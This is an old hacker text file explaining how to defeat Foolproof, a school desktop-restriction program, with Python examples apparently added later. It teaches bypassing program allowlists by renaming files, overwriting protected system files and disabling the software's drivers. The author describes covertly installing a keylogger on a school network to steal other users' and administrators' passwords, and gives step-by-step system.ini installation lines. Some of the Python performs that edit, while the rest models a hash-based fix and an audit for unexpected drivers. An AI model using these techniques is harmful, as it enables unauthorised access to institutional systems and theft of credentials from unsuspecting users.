Sections:
- What is Foolproof?
- Why Foolproof sucks.
- How to get around Foolproof.
- My personal path.
What is Foolproof?
Foolproof is a Windoze desktop security program, used
almost exclusively by schools and other large institutions
where the people using terminals on a network (or even
standalone machines) are not trusted to use the computers
freely. It is configurable, and depending on how many
precautions the administrator has switched on, certain
actions are restricted. For example, on a right click,
every menu item except arranging icons may be disabled.
Although this is an understandable precaution on a winblows
box, it is more than a little annoying for anyone who uses
computers for more than checking e-mail or playing Java
games. Another rather pesky feature is the inability to run
any program that has not been previously okayed by the
administrators.
Why Foolproof sucks.
Foolproof is not only annoying, but insulting. Ever since
the days of ITS (the Incompatible Timesharing System) in
Tech Square at MIT, any program or routine a computer is
made to perform that prevents or restricts the full power
and capabilities of the computer has been foolish,
insulting, and more than a little annoying. I too, should I
find myself in charge of a network as large as the one in
my former school, would cringe at the mere thought of 900
students, who know as little about computers as they do
about anything else, and at the constant worry that they
might download a canned hacking program and actually do
damage. However, I feel that the use of computers is a
privilege, that compromises must be made, and that the
student body must be made aware of the limitations and
appropriate uses of the system. Although my school had such
an acceptable use policy, it was far too harsh, limiting use
of the computers beyond what Foolproof ever did.
How to get around Foolproof
-Running Programs-
Here is where our adventures turn interesting. Foolproof,
though initially intimidating, has many gaping holes. The
first, and the easiest to exploit, is that the routine which
checks whether a program has been previously allowed is not
path specific; in fact, it uses no recognition technique
other than the file name, so by simply renaming your program
to the name of an allowed program, such as winword.exe
(Microsoft Word), you can run it, and nothing unusual
appears in the executable logs, which only ever see an
allowed name. This is probably the biggest vulnerability,
especially considering that it is so simple that any idiot
who stumbles across such a loophole could do significant
damage to the system. But we don't do that. We're hackers.
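To make the weakness concrete, here is an added Python example (not from the original article and not Foolproof's own code) that models the name-only check described above next to a hardened check that keys on the normalised full path and a SHA-256 digest of the file contents. The folder names, file names and byte strings are constructed stand-ins; the point is that a renamed copy in another folder fails on the path, and a copy dropped over the approved path fails on the digest.

```python
import hashlib
import os
import tempfile


def name_only_check(exe_path, allowed_names):
    """Weak check modelled on the text: only the file name is compared,
    so any file renamed to an allowed name passes."""
    allowed = {n.lower() for n in allowed_names}
    return os.path.basename(exe_path).lower() in allowed


def sha256_of(path):
    """SHA-256 of a file's contents, read in chunks."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_policy(paths):
    """Record normalised path -> digest for each approved program."""
    return {os.path.normcase(os.path.abspath(p)): sha256_of(p) for p in paths}


def path_and_hash_check(exe_path, policy):
    """Hardened check: the normalised full path must be in the policy AND the
    file's digest must match the one recorded when the program was approved."""
    key = os.path.normcase(os.path.abspath(exe_path))
    expected = policy.get(key)
    return expected is not None and sha256_of(exe_path) == expected


def demo():
    """Create a constructed 'real' winword.exe and a renamed 'compiler', run
    both checks against each, then overwrite the real file and check again.
    Returns a dict of verdicts (True = allowed to run)."""
    with tempfile.TemporaryDirectory() as root:
        office = os.path.join(root, "Office")
        home = os.path.join(root, "Home")
        os.makedirs(office)
        os.makedirs(home)

        real = os.path.join(office, "winword.exe")
        with open(real, "wb") as f:
            f.write(b"MZ stand-in for the real word processor (constructed)")

        # The attacker's binary renamed to an approved name in another folder.
        fake = os.path.join(home, "winword.exe")
        with open(fake, "wb") as f:
            f.write(b"MZ stand-in for a C++ compiler (constructed)")

        allowed_names = ["winword.exe", "notepad.exe"]
        policy = build_policy([real])

        verdicts = {
            "real_by_name": name_only_check(real, allowed_names),
            "fake_by_name": name_only_check(fake, allowed_names),  # passes: the hole
            "real_by_hash": path_and_hash_check(real, policy),
            "fake_by_hash": path_and_hash_check(fake, policy),    # blocked on path
        }

        # Copying the compiler over the approved path is caught by the digest.
        with open(real, "wb") as f:
            f.write(b"MZ stand-in for a C++ compiler (constructed)")
        verdicts["overwritten_by_hash"] = path_and_hash_check(real, policy)
        return verdicts


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(f"{name}: {'allowed' if verdict else 'blocked'}")
```

The digest has to be recorded at approval time and stored somewhere the user cannot write, otherwise the same trick that replaces system.ini replaces the policy too.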
-Editing System Files-
Although this varies with the individual system's
configuration, most system files, such as system.ini or
autoexec.bat (both very important to the informed
individual), are read only. As Foolproof loads as part of
the boot process, it is often impossible to boot into MS-DOS
to clear the read-only attribute, and MS-DOS prompts are
also restricted. Thus, if one wishes to alter such a file,
do this: First, you can see the contents of the file: just
open it in Microsoft Word (Notepad is often disallowed ;-)
and save it as a .txt file. Take it home and make the
necessary alterations, being careful not to do
damage(!!!!), make a backup, and (here's the funny part)
upload it to an online drive, you know, a free hard drive on
the internet such as www.xdrive.com. If you just brought
the file into school on a disk, you couldn't move it into
the folder to replace the existing file, or use any other
method to switch them, but when downloading files from the
online drive, one is given the option of REPLACING EXISTING
FILES! Jackpot. Now you can make those changes to run your
C++ compiler, winword.exe (wink wink), without typing in
that whole long MS-DOS command. Yes, yes, there are more
malicious uses for such system file editing, but we won't
do that. We're hackers.
-Fooling with Foolproof-
Now, I have never done this myself, and I certainly cannot
condone a course of action which would harm a system, but
there are ways to actually remove Foolproof, or "0wN" it, if
you will. These vary from subtle editing to simple
overwriting or removal.
First of all, with some programs it is possible to simply
press Ctrl-Alt-Delete and close the program; not so with
Foolproof. If you see it in the list of running programs,
it will not end when you close it. Worth a try though.
The next thing you do requires some research. The default
directory for Foolproof is C:\Sss, so look around; you will
find some .vxd files and other interesting material. I
never went so far as to actually edit these, but one could
easily use the method of editing system files shown above
to rewrite these to his/her liking. Among the files you
will find are several .ini files detailing the programs
which are allowed, and other interesting permission
material.
If you wanted to, you could just make a blank .vxd file
with the same name and replace the existing virtual device
drivers of Foolproof, so that they no longer perform their
intended functions. In fact, you could completely eliminate
the system this way. Unfortunately, there will undoubtedly
be unforeseen side effects of this (a blank file is not a
valid driver, so Windows may complain at boot or fail to
start cleanly), so do so at your own risk (or better yet,
don't).
My Personal Path.
Using the methods outlined above, I decided that the best
way for me to obtain full access to the school's
client/server NT network was to install a keylogger. Sure,
how lame. Maybe so, but they certainly serve a purpose. I
could have downloaded a crappy program, but I went top of
the line and actually bought (not cracked; programmers need
to eat too) a program called "International Keylogger
Stealth," by Amecisco Ind., available at ameciso.com or
Keylogger.com. This program, hereinafter referred to as
"iks", was perfectly tailored to my needs. It was a boot
sector program, and instead of using an automatic installer,
you could install it just by downloading the .vxd file to
the windows\system folder, and then an edited system.ini
file (see below) with 2 entries added. Then you just place
a file called iks.dat, or anything else ending in .dat,
somewhere on the comp and specify the name and path in
system.ini. This way, the .vxd file logs every keystroke,
including NT login passwords, in an encrypted form to the
.dat file. If someone were to open the .dat file in winword
or notepad, it would be unreadable, displaying random
characters. However, if you upload the .dat file to your
drive and download it at home, you can then run a program
called datview.exe, which decrypts it and reveals all
contained within. Now you can use other usernames or even
admins' passwords to have more fun. The golden fleece of
this method is if you can get an admin to run Foolproof's
.exe program, which, after prompting for a password, lets
one edit the configuration of Foolproof. If you get this,
you can do whatever you want. Also, this way you get all
the benefits of keyloggers on public terminals, including
the devious dial-up passwords and other account
information. But don't misuse it. After all, we're hackers.
The System.ini installation.
1. There are two files you should know about:
vikxd.vxd   --- the virtual device driver that logs all keystrokes
datview.exe --- the translator that generates the text file from the binary log
2. Let's suppose that you want iks to log to c:\kitkat\kitkat1.dat; here is what you can do:
- Copy vikxd.vxd to c:\windows\system;
- Edit c:\windows\system.ini: in the [386Enh] section, add the two entries "device=vikxd.vxd" and "VikxdLog=c:\kitkat\kitkat1.dat", so it looks like:
......
[386Enh]
(other entries)
(other entries)
device=vikxd.vxd
VikxdLog=c:\kitkat\kitkat1.dat
......
- Reboot.
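The change above is two lines appended to one section of a plain INI file, and that same edit is what the download-and-replace trick from the "Editing System Files" section lets you push onto a locked machine. What follows is an added Python example, not from the article and not Amecisco's or Foolproof's code, that performs the edit on a constructed stand-in for system.ini while preserving the repeated device= keys Windows 9x relies on, and then does what an administrator auditing such a machine would want: lists every VxD that [386Enh] loads and flags any not in a known-good baseline. The sample file contents and the BASELINE list are constructed; on a real machine the file is c:\windows\system.ini.

```python
import re

SECTION_RE = re.compile(r"^\s*\[([^\]]+)\]\s*$")

# Constructed stand-in for a stock Win9x c:\windows\system.ini (abridged).
SAMPLE_SYSTEM_INI = """[boot]
shell=Explorer.exe
drivers=mmsystem.dll

[386Enh]
device=*vmm
device=*vshare
device=*vpd
mouse=*vmouse
EMMExclude=C000-CFFF

[drivers]
wave=mmdrv.dll
"""


def parse_sections(text):
    """Split an INI file into an ordered list of (section, [lines]).
    Duplicate keys such as repeated 'device=' are kept, which the stdlib
    configparser would silently collapse. Preamble lines get section None."""
    sections = [(None, [])]
    for line in text.splitlines():
        m = SECTION_RE.match(line)
        if m:
            sections.append((m.group(1), []))
        else:
            sections[-1][1].append(line)
    return sections


def render(sections):
    """Serialise the structure produced by parse_sections back to text."""
    out = []
    for name, lines in sections:
        if name is not None:
            out.append(f"[{name}]")
        out.extend(lines)
    return "\n".join(out) + "\n"


def add_entries(text, section, entries):
    """Append key=value lines to the end of `section`, creating it if absent.
    Blank separator lines at the end of the section stay after the new lines."""
    sections = parse_sections(text)
    for name, lines in sections:
        if name is not None and name.lower() == section.lower():
            trailing = []
            while lines and not lines[-1].strip():
                trailing.append(lines.pop())
            lines.extend(entries)
            lines.extend(trailing)
            break
    else:
        sections.append((section, list(entries)))
    return render(sections)


def loaded_devices(text):
    """Values of every device= line in [386Enh], in load order. Names starting
    with '*' are drivers built into vmm32.vxd; anything else is a file on disk,
    which is exactly where a dropped .vxd shows up."""
    devices = []
    for name, lines in parse_sections(text):
        if name is None or name.lower() != "386enh":
            continue
        for line in lines:
            key, sep, value = line.partition("=")
            if sep and key.strip().lower() == "device":
                devices.append(value.strip())
    return devices


def unexpected_devices(text, baseline):
    """Devices loaded by [386Enh] that are not in the known-good baseline."""
    known = {b.lower() for b in baseline}
    return [d for d in loaded_devices(text) if d.lower() not in known]


BASELINE = ["*vmm", "*vshare", "*vpd"]  # constructed known-good list


def demo():
    """Apply the two-line edit from the text to the sample, then audit it."""
    modified = add_entries(
        SAMPLE_SYSTEM_INI, "386Enh",
        ["device=vikxd.vxd", r"VikxdLog=c:\kitkat\kitkat1.dat"],
    )
    return modified, unexpected_devices(modified, BASELINE)


if __name__ == "__main__":
    modified, suspicious = demo()
    print(modified)
    print("unexpected VxDs:", suspicious)
```

The audit side is the useful half for whoever runs the lab: a baseline taken from a clean image, compared against system.ini (and the contents of windows\system) on each machine, shows the extra device= line the moment it appears.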
Credits
written by TixO
version 1.0